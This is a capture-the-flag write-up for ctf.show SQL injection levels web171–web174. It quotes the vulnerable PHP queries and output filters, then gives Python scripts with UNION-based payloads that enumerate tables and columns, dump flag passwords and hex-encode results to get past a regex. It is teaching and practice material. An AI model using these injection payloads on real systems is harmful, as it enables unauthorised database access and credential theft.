web171
查询语句
// Vulnerable challenge source as quoted on the page (the surrounding handler is
// not shown). $_GET['id'] is concatenated unescaped and uncast into the
// single-quoted id predicate, so any value that starts with a quote breaks out
// of the string literal -- a textbook string-type SQL injection. The fix is a
// prepared statement with id bound as a parameter, never string concatenation.
// NOTE(review): the UNION payloads below use three columns and the table
// `ctfshow_user`, while this SELECT names two columns and the table `user`; the
// quoted query is presumably abridged relative to the live challenge -- confirm.
// Concatenate the SQL statement to look up the user with the given id
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
#无过滤的字符型注入：id 被原样拼进单引号内，`-1'` 闭合引号后即可 union 注入，`--+` 把末尾的 `' limit 1;` 注释掉（`+` 经 URL 解码后成为 MySQL 中 `--` 之后必需的空格）。
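import requests

# Per-instance challenge host: the UUID subdomain differs for every deployment,
# so replace it with the one your own instance shows. Only point this at the
# instance you were issued.
url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="

# Three enumeration steps, each a UNION-based injection against the
# single-quoted `id = '...'` predicate of the quoted query:
#   `-1'`   closes the string literal with an id that presumably matches no
#           row, so the only row returned is the one our UNION adds;
#   `1,2,…` pads the UNION to three columns -- that implies the live query
#           returns three columns (id, username, password), so the two-column
#           SELECT quoted above is presumably abridged; confirm against the
#           challenge source;
#   `--+`   comments out the trailing `' limit 1;`. MySQL requires whitespace
#           after `--`, and the `+` is decoded to a space by the server.
# Step 1: list the tables of the current database.
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
# Step 2: list the columns of the table found in step 1.
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"
# Step 3: dump the whole table; the flag row is among the UNIONed rows because
# the UNIONed SELECT has no `username !='flag'` predicate and `limit 1` is
# commented out.
payload = "-1' union select id,username,password from ctfshow_user --+"

# Send every step instead of only the last one, so the recon that justifies the
# hard-coded table and column names is reproducible. The payload is appended
# to the URL as a raw string on purpose: passing it via `params=` would
# percent-encode `+` as %2B and the `-- ` comment would no longer terminate.
# The timeout keeps a dead instance from hanging the script indefinitely.
for step, injected in (("tables", tablename), ("columns", columnname), ("data", payload)):
    res = requests.get(url + injected, timeout=10)
    print(step, res.text)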
web172
// Vulnerable challenge source as quoted on the page; $row and $ret come from
// handler code that is not shown (presumably the fetched row and the response
// array -- confirm). $_GET['id'] is concatenated unescaped into the single-quoted
// id predicate; a bound parameter in a prepared statement would close this.
// Concatenate the SQL statement to look up the user with the given id
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag. Both this check and the
// `username !='flag'` predicate above look only at the returned row's username,
// so a UNIONed row carrying any other username can still contain flag's
// password (e.g. via a scalar subquery) -- which is what the exploit below does.
// Filtering the output is not a substitute for parameterising the query.
if($row->username!=='flag'){
$ret['msg']='查询成功';
}
#无过滤的字符型注入，但查询加了 username!='flag' 的限制，返回后又检查 $row->username!=='flag'。两处都只看返回行的 username，所以用标量子查询 (select password from ctfshow_user2 where username='flag') 直接取出 flag 行的 password 即可绕过。
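import requests

# Per-instance challenge host; replace the UUID subdomain with your own and
# only run this against the instance you were issued.
url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="

# Same string-type injection as web171, with two differences visible in the
# quoted source: the query returns two columns (username, password), so the
# UNION supplies two; and the handler rejects rows whose username is 'flag'.
# That check only looks at the returned row's username, so the final payload
# returns a row whose username is `1` and fetches flag's password through a
# scalar subquery -- the outer `username !='flag'` predicate never applies to
# the subquery.
#   `0'`  closes the quoted id with a value that presumably matches no row;
#   `--+` comments out the trailing `' limit 1;` (the `+` decodes to the
#         whitespace MySQL requires after `--`).
# Step 1: list the tables of the current database.
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
# Step 2: list the columns of the table found in step 1.
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+"
# Step 3: read flag's password directly, under a non-'flag' username.
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') --+"

# Run all three steps rather than only the final one so the recon is
# reproducible. The payload is appended raw on purpose -- `params=` would
# percent-encode `+` as %2B and break the `-- ` comment. The timeout prevents
# hanging on a dead instance.
for step, injected in (("tables", tablename), ("columns", columnname), ("data", payload)):
    res = requests.get(url + injected, timeout=10)
    print(step, res.text)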
web173
// Vulnerable challenge source as quoted on the page; the surrounding handler
// (where $ret and the row fetch live) is not shown. $_GET['id'] is still
// concatenated unescaped into the single-quoted predicate -- the injection
// point is unchanged from the earlier levels, only the output is filtered.
// Concatenate the SQL statement to look up the user with the given id
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag: the regex runs over the whole
// JSON-encoded $ret, so the username-only bypass of the previous level no
// longer works. It matches the literal word only, though, which is why
// hex()-ing the extracted value (see the payloads below) slips past it.
// An output blacklist is not a defence; the query itself must be parameterised.
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}
注入点本身仍无过滤，新增的是对整个返回结果（json_encode($ret)）做 /flag/i 正则检查：返回内容里任何位置出现 flag 字样就不会回显。
使用 hex() 把查询结果转成十六进制再返回，正则匹配不到 flag 字样；拿到的十六进制串需要在本地解码才能得到明文。
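import re

import requests

# Per-instance challenge host; replace the UUID subdomain with your own and
# only run this against the instance you were issued.
url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="

# The handler regex-checks the whole JSON-encoded result for /flag/i, so any
# field containing the word would suppress the response. hex() converts the
# value to hex digits inside the database, the regex never sees "flag", and the
# client decodes the hex afterwards. Injection mechanics are as in web171:
# `-1'` closes the quoted id, the UNION pads to the query's three columns, and
# `--+` comments out the trailing `' limit 1;`.
# Step 1: list the tables. Not hex-wrapped on the page; that only matters if a
# table name contained "flag".
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+"
# Step 2: list the columns, hex-encoded.
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) --+"
# Step 3: read flag's password, hex-encoded so the word "flag" never appears
# in the JSON the regex inspects.
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) --+"


def decode_hex_blobs(text):
    """Return the printable-ASCII decoding of every even-length hex run in `text`.

    Only runs of eight or more hex characters are considered, so short numeric
    fields in the JSON envelope are ignored. Runs that are odd-length or do not
    decode to printable ASCII are skipped rather than raising.
    """
    decoded = []
    for blob in re.findall(r"[0-9A-Fa-f]{8,}", text):
        if len(blob) % 2:
            continue
        try:
            value = bytes.fromhex(blob).decode("ascii")
        except UnicodeDecodeError:
            continue
        if value.isprintable():
            decoded.append(value)
    return decoded


# Run all three steps so the recon is reproducible, and decode the hex the
# server hands back instead of leaving that to the reader. The payload is
# appended raw on purpose -- `params=` would percent-encode `+` as %2B and
# break the `-- ` comment. The timeout prevents hanging on a dead instance.
for step, injected in (("tables", tablename), ("columns", columnname), ("data", payload)):
    res = requests.get(url + injected, timeout=10)
    print(step, res.text)
    for value in decode_hex_blobs(res.text):
        print(step, "decoded:", value)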
web174
// Vulnerable challenge source as quoted on the page; the surrounding handler
// (where $ret is built) is not shown. The query is constructed exactly as in
// the earlier levels, so the injection point is unchanged; only the output
// filter is tightened. The real fix remains a parameterised query.
// Concatenate the SQL statement to look up the user with the given id
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag: now any ASCII digit anywhere in
// the JSON-encoded $ret also suppresses the success message. Because hex
// digits include 0-9, the hex() bypass used for web173 is defeated here; the
// extracted value would have to reach the response containing neither "flag"
// nor any digit. NOTE(review): no exploit for this level is in view on the page.
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}